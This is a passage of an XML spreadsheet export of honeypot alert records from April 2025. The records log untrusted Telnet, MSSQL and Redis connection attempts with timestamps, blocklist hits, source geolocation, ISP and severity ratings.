    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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e:83f4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2987"/>
    <x v="2987"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:01:44"/>
    <d v="2025-04-05T16:01:44"/>
    <d v="2025-04-05T16:01:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Malappuram"/>
    <s v="Tirur"/>
    <s v="1254346"/>
    <s v="NA"/>
    <s v="10.9137"/>
    <s v="75.9212"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:1e0d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2988"/>
    <x v="2988"/>
    <s v="36-233-177-125.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T16:00:50"/>
    <d v="2025-04-04T19:46:08"/>
    <d v="2025-04-05T16:00:50"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&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NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:24e9:b17d"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2989"/>
    <x v="2989"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T15:52:44"/>
    <d v="2025-04-05T15:50:54"/>
    <d v="2025-04-05T15:52:44"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="LK"/>
    <s v="Sri Lanka"/>
    <s v="1"/>
    <s v="Western"/>
    <s v="Colombo District"/>
    <s v="Colombo (Colombo Division)"/>
    <s v="1248991"/>
    <s v="NA"/>
    <s v="6.93435"/>
    <s v="79.8461"/>
    <s v="9329"/>
    <s v="Sri Lanka Telecom Ltd"/>
    <s v="Sri Lanka Telecom Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2009-01-29"/>
    <s v="SLTADSL-SLT-LK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7087:ded1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2990"/>
    <x v="2990"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T15:50:06"/>
    <d v="2025-04-05T15:50:06"/>
    <d v="2025-04-05T15:50:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="TZ"/>
    <s v="Tanzania"/>
    <s v="02"/>
    <s v="Dar es Salaam Region"/>
    <s v="Ilala District"/>
    <s v="Dar es Salaam"/>
    <s v="160263"/>
    <s v="NA"/>
    <s v="-6.81899"/>
    <s v="39.2867"/>
    <s v="33765"/>
    <s v="TTCLDATA"/>
    <s v="Tanzania Telecommunications CO. LTD"/>
    <s v="corporate"/>
    <s v="Ttcl"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:293b:92b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2991"/>
    <x v="2991"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T15:24:05"/>
    <d v="2025-04-05T15:24:05"/>
    <d v="2025-04-05T15:24:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:ef6f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2992"/>
    <x v="2992"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T15:22:06"/>
    <d v="2025-04-05T15:18:43"/>
    <d v="2025-04-05T15:22:06"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Udupi"/>
    <s v="Udupi"/>
    <s v="1253952"/>
    <s v="NA"/>
    <s v="13.3347"/>
    <s v="74.7462"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:a2a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2993"/>
    <x v="2993"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:58:04"/>
    <d v="2025-04-05T14:35:35"/>
    <d v="2025-04-05T14:58:04"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:6665"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2994"/>
    <x v="2994"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:57:57"/>
    <d v="2025-04-05T14:57:57"/>
    <d v="2025-04-05T14:57:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_REDIS_HC1"/>
    <s v="6379"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="45102"/>
    <s v="ALIBABA-CN-NET"/>
    <s v="Alibaba.com LLC"/>
    <s v="hosting"/>
    <s v="Delta Centric LLC, Zenlayer Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f56:2210"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2995"/>
    <x v="2995"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:41:48"/>
    <d v="2025-04-02T09:59:15"/>
    <d v="2025-04-05T14:41:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NM"/>
    <s v="New Mexico"/>
    <s v="Torrance"/>
    <s v="Moriarty"/>
    <s v="5480181"/>
    <s v="87035"/>
    <s v="35.0044"/>
    <s v="-106.05"/>
    <s v="11996"/>
    <s v="Lobo Internet Services, Ltd"/>
    <s v="Lobo Internet Services, Ltd"/>
    <s v="business"/>
    <s v="Lobo Internet Services, Ltd"/>
    <s v="2007-10-15"/>
    <s v="LOBO-INTERNET-V4-01"/>
    <s v="2012-02-24"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cffb:3d59"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2996"/>
    <x v="2996"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:35:45"/>
    <d v="2025-01-08T08:53:03"/>
    <d v="2025-04-05T14:35:45"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Jalandhar"/>
    <s v="Jalandhar"/>
    <s v="1268782"/>
    <s v="NA"/>
    <s v="31.3256"/>
    <s v="75.5792"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312b:5bb3"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2997"/>
    <x v="2997"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:29:26"/>
    <d v="2025-04-05T14:29:26"/>
    <d v="2025-04-05T14:29:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f0d7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2998"/>
    <x v="2998"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:22:29"/>
    <d v="2025-04-05T14:22:29"/>
    <d v="2025-04-05T14:22:29"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:b1e9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2999"/>
    <x v="2999"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:19:34"/>
    <d v="2025-04-05T14:19:34"/>
    <d v="2025-04-05T14:19:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:fca5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3000"/>
    <x v="3000"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T14:08:51"/>
    <d v="2025-04-04T16:23:56"/>
    <d v="2025-04-05T14:08:51"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="FA"/>
    <s v="Al Farwaniyah"/>
    <s v="NA"/>
    <s v="Janūb as Surrah"/>
    <s v="285603"/>
    <s v="NA"/>
    <s v="29.2692"/>
    <s v="47.9781"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="2012-01-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2524:4d7b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3001"/>
    <x v="3001"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:43:50"/>
    <d v="2025-04-05T13:43:50"/>
    <d v="2025-04-05T13:43:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1ed2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3002"/>
    <x v="3002"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:35:10"/>
    <d v="2025-03-17T13:42:12"/>
    <d v="2025-04-05T13:35:10"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;52324&amp;&amp;52422&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL Internet"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f6:ef22"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3003"/>
    <x v="3003"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:33:36"/>
    <d v="2025-04-05T13:33:36"/>
    <d v="2025-04-05T13:33:36"/>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2:cf8e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3004"/>
    <x v="3004"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:15:46"/>
    <d v="2025-04-05T13:15:46"/>
    <d v="2025-04-05T13:15:46"/>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5:aeb4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3005"/>
    <x v="3005"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:09:36"/>
    <d v="2025-04-05T12:57:10"/>
    <d v="2025-04-05T13:09:36"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="None"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:b647"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3006"/>
    <x v="3006"/>
    <s v="59-127-79-196.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T13:01:06"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-05T13:01:06"/>
    <n v="344"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
